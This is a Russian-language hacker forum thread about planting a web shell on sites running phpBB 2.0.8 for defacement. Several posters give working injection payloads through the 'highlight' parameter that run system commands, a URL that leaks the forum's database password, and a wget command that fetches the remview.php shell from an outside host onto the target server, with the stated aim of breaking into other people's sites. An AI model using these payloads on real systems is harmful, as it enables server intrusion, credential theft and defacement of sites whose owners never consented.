Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group

Discussion in 'Песочница' started by onyx3, 21 Dec 2004.

  1. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    А как посматреть какие папки открыты на запись???
     
  2. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    помогите плиззззз
     
  3. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Народ какой коммандой можно посматреть какие папки открыты на запись???
     
  4. KEZ

    KEZ Guest

    Reputations:
    0
    Дорогие друзья.
    Вы хоть раз видели сервер чтоб там было разрешено
    `ls` т.е. safe mode?
    Я не.
    Так что (как у меня в старом видео) - %2527.system($_GET[cmd]).include%2527
    INCLUDE нужно для того чтобы кусочек #b( ... убрать из system.
     
  5. BlackPrince

    BlackPrince Elder - Старейшина

    Joined:
    13 Oct 2004
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    find / -perm -2 -ls
     
    #25 BlackPrince, 4 Feb 2005
    Last edited: 4 Feb 2005
  6. KEZ

    KEZ Guest

    Reputations:
    0
    Смотреть папки, открытые на запись (сервер unix):
    ls -la
    просто ls - только список, ls -1 - вертикальный
     
  7. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    А если сервер стоит на винде Хр, то эта комманда не изменится???
     
  8. YooogI

    YooogI NoMoneyNoWork

    Joined:
    3 Feb 2005
    Messages:
    98
    Likes Received:
    3
    Reputations:
    0
    дык kez написал команды для никсов,а ты про винду!на винде cmd!
     
  9. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Ну вот я так и думал.... а для винды как можно посматреть???
     
  10. YooogI

    YooogI NoMoneyNoWork

    Joined:
    3 Feb 2005
    Messages:
    98
    Likes Received:
    3
    Reputations:
    0
    У себя на тачке:
    выполнить cmd
    в коммандной help
     
  11. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Люди, Я непрошу взломать то или это. Мне нужна статья или какоенибудь пояснение как использовать команды как wget ls -la и т.д. в вэб интерфейсе. Хочу разобраться. Цель заливка remview.php. И есть ли сейчас перспектива в дэфейсе такого плана? Заранее благадарен
     
  12. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    wget - заливка файла на сайт
    ls - просмотр файлов в папке
    ls -la - полный просмотр с правами доступа))
    перемещение по каталогам, команда: cd
    cd .. - перемещение на каталог выше
    wget http://hompaga.ru/remview.php - зальёт тебе remview.php на сайт..
     
  13. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Можно на примере
    http://[Target]/forum/index.php?showtopic=[№]?
    Это пример IPB форума ну и остальные аналогично...
    Как я понял, что опирирование идёт по средствам адресной строки браузера и всё?
     
  14. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    &highlight=%2527.$poster=`pwd`.%2527 Это как я понял выдаёт дирикторию
    Далее это параметры мускула так?
    &highlight=%2527.$poster=`bdname`.%2527
    &highlight=%2527.$poster=`bdpass`.%2527
    Просмотр попок для записи
    &highlight=%2527.$poster=`&cmd`.%2527&cmd=cd ..;ls -l

    Короче поправте если что то накарябал нетак... =\
     
  15. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
  16. KEZ

    KEZ Guest

    Reputations:
    0
    ЕЕЕЕЕЕЕЕЕЕЕ Я щас убью когото.
    Последний раз говорю.
    Если ктокто придумал такой сплойт это не значит что он работает!
    `ls` не разрешено если не safe mode.
    Вот так можно
    viewtopic.php?command=uname -a;ls -la&t=10&highlight=%2527.system($_GET[command]).include%2527
    ЕЩЁ РАЗ. В конце остается кусок )b# типа того. Он идет в system() т.к. там без скобок.
    Поэтому я его сую в ф-ию которая НИЧЕ не возвращает!
     
  17. KEZ

    KEZ Guest

    Reputations:
    0
    Вообщем уже много людей хотят со мной пообщаться по поводу include в конце. Стучите в асю. И все считают что я не то написал. И потом вылезает ошибка Cannot include ")b#"
    Все правильно!
    Если надо узнать пароль\логин к базе
    http://.../viewtopic.php?t=10&highlight=%2527.$poster=$dbpasswd.%2527
     
  18. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Ок! Спасибо братуха :) Разобрался!
     
  19. KEZ

    KEZ Guest

    Reputations:
    0
    Пожалуста... надо в новостях это подправить ))
     
Loading...